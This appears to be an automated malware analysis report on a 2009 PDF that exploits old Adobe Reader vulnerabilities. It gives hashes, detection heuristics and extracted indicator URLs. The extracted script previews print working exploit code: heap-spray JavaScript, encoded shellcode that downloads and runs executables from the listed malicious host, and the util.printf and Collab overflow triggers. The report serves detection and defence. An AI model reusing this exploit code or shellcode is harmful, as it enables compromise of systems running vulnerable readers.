PDF malware analysis — malicious · 16e6630980b32da0

MALICIOUS

PDF

76.7 KB Created: 2009-12-14 19:45:47 Authoring application: PDF Library 9.10.10 (via PDF Library 7.7.8)

MD5: a9a7e8e976cd649eb1794bd6fca9ea3a SHA-1: 98104c15c7f413561ab8b8a1ea534fe9a5fa03af SHA-256: 16e6630980b32da0c28156401230cb2f4a8641ae67fe9eb6f87b9158e26c5f24

530 Risk Score

Malware Insights

MITRE ATT&CK

T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF file contains embedded JavaScript that exploits multiple known Adobe Reader vulnerabilities, including CVE-2009-0927, CVE-2007-5659, and CVE-2008-2992. The deobfuscated JavaScript indicates that it downloads a second-stage payload from the URLs provided. The extracted URLs are the primary indicators of compromise.

Machine Learning

Nyx PDF Classifier malicious score 0.9999

Heuristics 12

Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927

PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659

PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992

PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH

A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
ClamAV: Pdf.Exploit.Agent-36110 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Pdf.Exploit.Agent-36110
Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT

One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
JavaScript action low 2 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL

Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
ASCIIHexDecode filter (with exploit indicators) medium PDF_FILTER_HEX

Hex-encoding filter present alongside exploit delivery indicators — often used to hide payload or shellcode bytes
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://style-boards.com/forum/diksvw2.exe Referenced by PDF JavaScript
- http://style-boards.com/forum/click.php?r=Referenced by PDF JavaScript
- http://style-boards.com/forum/hijors2.exeReferenced by PDF JavaScript
- http://style-boards.com/forum/deip2.exeReferenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`javascript_obj0007_000.js` `67f048ef058f4442b292be0f3a6ee9e0977c58971ab49c1c302a8e3d1c838a27`	pdf-javascript-stream	PDF /JS object 7 at offset 0x1A5	38785 bytes
Preview script First 1,000 lines of the extracted script var aeru=true;jwyz="";ghkrv="";cdghlr="cdghlr";cfilsx='';bkloqs="";cilq='';bmnrsv=39938;stxy=34557;fkqruv="fkqruv";dlpqz=false;aduwy="";ijsxy=38601;dhoqv="dhoqv";lpqrx="";var eimsz='',lpqtvz="lpqtvz",dirtxz='',fhqwy=24960,cdpt="",fhkptw=0,cpqstw=String,abjy=cpqstw['firBoBmlCjhiaWriCBoWdWeW'.replace(/[WBlij]/g,'')],bglmuv=String,dmvxy=bglmuv['e3vua8lX'.replace(/[Xwu83]/g,'')],dijs="7",cdehow="",ajlp=[68,65,64,157,172,165,154,171,160,166,165,87,157,160,175,150,160,171,95,176,152,169,170,167,99,87,163,156,165,96,178,68,65,64,64,174,159,160,163,156,87,95,176,152,169,170,167,101,163,156,165,158,171,159,87,97,87,105,87,115,87,163,156,165,96,178,68,65,64,64,64,176,152,169,170,167,87,98,116,87,176,152,169,170,167,114,68,65,64,64,180,68,65,64,64,176,152,169,170,167,87,116,87,176,152,169,170,167,101,170,172,153,170,171,169,160,165,158,95,103,99,87,163,156,165,102,105,96,114,68,65,64,64,169,156,171,172,169,165,87,176,152,169,170,167,114,68,65,64,180,68,65,68,65,64,157,172,165,154,171,160,166,165,87,172,171,160,163,150,167,169,160,165,171,157,95,96,178,68,65,64,64,173,152,169,87,167,152,176,163,166,152,155,87,116,87,172,165,156,170,154,152,167,156,95,89,92,172,124,121,124,112,92,172,103,103,103,104,92,172,108,109,103,103,92,172,120,104,109,107,92,172,103,103,106,103,92,172,103,103,103,103,92,172,107,103,111,121,92,172,111,121,103,122,92,172,104,122,110,103,92,172,111,121,120,123,92,172,103,111,107,103,92,172,122,106,108,124,92,172,111,121,108,108,92,172,111,121,124,122,92,172,103,111,107,108,92,172,106,106,108,105,92,172,122,104,123,105,92,172,103,106,122,105,92,172,104,103,106,105,92,172,111,103,107,103,92,172,103,103,106,111,92,172,125,108,110,108,92,172,122,105,111,121,92,172,108,123,108,120,92,172,103,107,122,105,92,172,108,108,103,103,92,172,124,122,111,121,92,172,108,104,108,104,92,172,108,109,108,106,92,172,109,103,108,110,92,172,108,123,111,121,92,172,106,106,103,111,92,172,111,121,122,103,92,172,103,122,110,108,92,172,125,124,111,121,92,172,110,109,103,106,92,172,111,121,106,122,92,172,110,111,107,124,92,172,122,125,103,106,92,172,108,104,111,121,92,172,108,105,104,122,92,172,108,104,111,121,92,172,108,105,105,107,92,172,110,104,111,121,92,172,107,124,104,107,92,172,110,108,111,112,92,172,111,121,125,122,92,172,105,103,110,104,92,172,125,110,103,106,92,172,107,120,112,112,92,172,107,105,120,123,92,172,106,121,109,103,92,172,125,122,108,108,92,172,103,107,110,108,92,172,122,103,106,106,92,172,106,110,124,121,92,172,125,125,106,106,92,172,107,108,103,106,92,172,112,110,103,122,92,172,122,125,111,121,92,172,110,108,120,124,92,172,105,121,125,123,92,172,107,125,125,112,92,172,124,111,108,104,92,172,125,125,112,107,92,172,125,125,125,125,92,172,122,106,106,121,92,172,110,107,109,104,92,172,124,121,103,105,92,172,111,121,123,112,92,172,103,122,107,108,92,172,108,124,112,105,92,172,125,105,103,106,92,172,124,103,123,104,92,172,122,109,103,106,92,172,122,112,106,106,92,172,121,110,103,125,92,172,108,125,103,111,92,172,124,104,122,104,92,172,103,106,103,105,92,172,103,106,122,120,92,172,111,121,122,125,92,172,103,106,103,104,92,172,111,112,122,105,92,172,125,111,107,108,92,172,111,121,109,104,92,172,125,111,107,108,92,172,108,124,108,125,92,172,122,112,108,121,92,172,108,108,122,106,92,172,124,122,111,121,92,172,124,111,108,104,92,172,125,125,107,112,92,172,125,125,125,125,92,172,109,111,108,103,92,172,109,103,124,111,92,172,103,107,121,125,92,172,109,122,124,111,92,172,125,125,125,125,92,172,106,106,125,125,92,172,108,105,123,105,92,172,125,125,108,105,92,172,103,111,110,108,92,172,123,103,125,125,92,172,107,108,111,112,92,172,111,121,125,122,92,172,125,122,107,108,92,172,122,106,122,112,92,172,111,121,108,108,92,172,111,106,124,122,92,172,103,122,124,122,92,172,107,108,111,123,92,172,108,103,125,107,92,172,107,108,122,109,92,172,110,108,125,107,92,172,107,108,122,109,92,172,110,105,125,108,92,172,107,108,122,109,92,172,109,122,125,109,92,172,107,108,122,109,92,172,109,123,125,110,92,172,107,108,122,109,92,172,109,125,125,111,92,172,107,108,122,109,92,172,109,124,125,112,92,172,107,108,122,109,92,172,105,124,125,120,92,172,107,108, ... (truncated)
`legacy_pdfkit_stage_000.js` `1f084620d706a2f283068a44645e98f27c2b4e2a2179e9c368842d090d939589`	deobfuscated-js	numeric array subtract-key decoded JavaScript at offset 0x1A5	10024 bytes
Detection ClamAV: Js.Exploit.Shellcode-18 Obfuscation or payload: likely Carved artifact contains 9 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script function fix_it(yarsp, len){ while (yarsp.length * 2 < len){ yarsp += yarsp; } yarsp = yarsp.substring(0, len/2); return yarsp; } function util_printf(){ var payload = unescape("%uEBE9%u0001%u5600%uA164%u0030%u0000%u408B%u8B0C%u1C70%u8BAD%u0840%uC35E%u8B55%u8BEC%u0845%u3352%uC1D2%u03C2%u1032%u8040%u0038%uF575%uC28B%u5D5A%u04C2%u5500%uEC8B%u5151%u5653%u6057%u5D8B%u3308%u8BC0%u0C75%uFE8B%u7603%u8B3C%u784E%uCF03%u518B%u521C%u518B%u5224%u718B%u4E14%u7589%u8BFC%u2071%uF703%u4A99%u42AD%u3B60%uFC55%u0475%uC033%u37EB%uFF33%u4503%u970C%uCF8B%u75AE%u2BFD%u4FF9%uE851%uFF94%uFFFF%uC33B%u7461%uEB02%u8BD9%u0C45%u5E92%uF203%uE0D1%uC603%uC933%uB70F%u5F08%uE1C1%u0302%u03CA%u8BCF%u0301%u89C2%uF845%u8B61%uF845%u5E5F%uC95B%u55C3%uEC8B%uE851%uFF49%uFFFF%u6850%u60E8%u04BF%u6CE8%uFFFF%u33FF%u52D2%uFF52%u0875%uD0FF%u4589%u8BFC%uFC45%uC3C9%u8B55%u83EC%u0CEC%u458D%u50F4%u45C6%u75F4%u45C6%u72F5%u45C6%u6CF6%u45C6%u6DF7%u45C6%u6FF8%u45C6%u6EF9%u45C6%u2EFA%u45C6%u64FB%u45C6%u6CFC%u45C6%u6CFD%u45C6%u00FE%uA0E8%uFFFF%u50FF%u5D68%u118A%uE816%uFF15%uFFFF%uC483%u850C%u74C0%u6A15%u6A00%uFF00%u0C75%u75FF%u6A08%uFF00%u85D0%u75C0%u4003%uC3C9%uC033%uC3C9%u3357%u8BC0%u244C%u8B0C%u247C%uFC08%uAAF3%uC35F%u4C8B%u0424%u3980%u8B00%u74C1%u4006%u3880%u7500%u2BFA%uC3C1%u8B55%u83EC%u64EC%u8D53%uF045%u3357%u50DB%u45C6%u6BF0%u45C6%u65F1%u45C6%u72F2%u45C6%u6EF3%u45C6%u65F4%u45C6%u6CF5%u45C6%u33F6%u45C6%u32F7%u45C6%u2EF8%u45C6%u64F9%u45C6%u6CFA%u45C6%u6CFB%u5D88%uE8FC%uFF0B%uFFFF%u6850%u4368%u8EF9%u80E8%uFFFE%u8BFF%u8DF8%u9C45%u446A%uE850%uFF7E%uFFFF%u458D%u6AE0%u5010%u73E8%uFFFF%u83FF%u1CC4%u458D%u50E0%u458D%u509C%u5353%u5353%u5353%u75FF%uC708%u9C45%u0044%u0000%uFF53%u5FD7%uB60F%u5BC0%uC3C9%u8B55%u51EC%u5351%u5756%u426A%u72E8%u0000%u8B00%u33D8%u85F6%u59DB%u45C7%u61F8%u652E%uC778%uFC45%u0065%u0000%u567E%u458D%u50F8%uE856%u0051%u0000%u5059%uB1E8%uFFFE%u85FF%u59C0%u7459%u8D39%u0146%uE850%u003B%u0000%uF88B%u458D%u50F8%u21E8%uFFFF%u85FF%u59C0%u7459%u570C%u01E8%uFFFF%u59FF%u44C6%uFF38%u5073%u458D%uFEF8%u5800%u458D%u50F8%uE857%uFE74%uFFFF%u5959%u4646%uF33B%uAA7C%u5E5F%uC95B%u55C3%uEC8B%u5351%u6066%u32B1%u00E8%u0000%u5800%u0838%u0374%uEB40%u40F9%u5D8B%u8008%u42FB%u0875%uDB33%u188A%uC38B%u17EB%u1838%u1176%u3340%u84C9%u74DB%u400C%u0838%uFB75%uFE40%uEBCB%u33F2%u89C0%uFC45%u458B%u5BFC%uC3C9%u0232%u7468%u7074%u2F3A%u732F%u7974%u656C%u622D%u616F%u6472%u2E73%u6F63%u2F6D%u6F66%u7572%u2F6D%u6964%u736B%u7776%u2E32%u7865%u0065%u7468%u7074%u2F3A%u732F%u7974%u656C%u622D%u616F%u6472%u2E73%u6F63%u2F6D%u6F66%u7572%u2F6D%u6C63%u6369%u2E6B%u6870%u3F70%u3D72%u0000"); var nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A") var heapblock = nop + payload; var bigblock = unescape("%u0A0A%u0A0A"); var headersize = 20; var spray = headersize + heapblock.length; while (bigblock.length < spray){ bigblock += bigblock; } var fillblock = bigblock.substring(0, spray); var block = bigblock.substring(0, bigblock.length-spray); while (block.length+spray < 0x40000){ block = block + block + fillblock; } var mem_array = new Array(); for (var i = 0; i < 1400; i++){ mem_array[i] = block + heapblock; } var num = 12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888; util.printf("%45000f", num); } function collab_email(){ var shellcode = unescape("%uEBE9%u0001%u5600%uA164%u0030%u0000%u408B%u8B0C%u1C70%u8BAD%u0840%uC35E%u8B55%u8BEC%u0845%u3352%uC1D2%u03C2%u1032%u8040%u0038%uF575%uC28B%u5D5A%u04C2%u5500%uEC8B%u5151%u5653%u6057%u5D8B%u3308%u8BC0%u0C75%uFE8B%u7603%u8B3C%u784E%uCF03%u518B%u521C%u518B%u5224%u718B%u4E14%u7589%u8BFC%u2071%uF703%u4A99%u42AD%u3B60%uFC55%u0475%uC033%u37EB%uFF33%u4503%u970C%uCF8B%u75AE%u2BFD%u4FF9%uE851%uFF94%uFFFF%uC33B%u7461%uEB02%u8BD9%u0C45%u5E92%uF203%uE0D1%uC603%uC933%uB70F%u5F08%uE1C1%u0302%u03CA%u8BCF%u0301%u89C2%uF845%u8B61%uF845%u5E5F%uC95B%u55C3%uEC8B%uE851%uFF49%uFF ... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.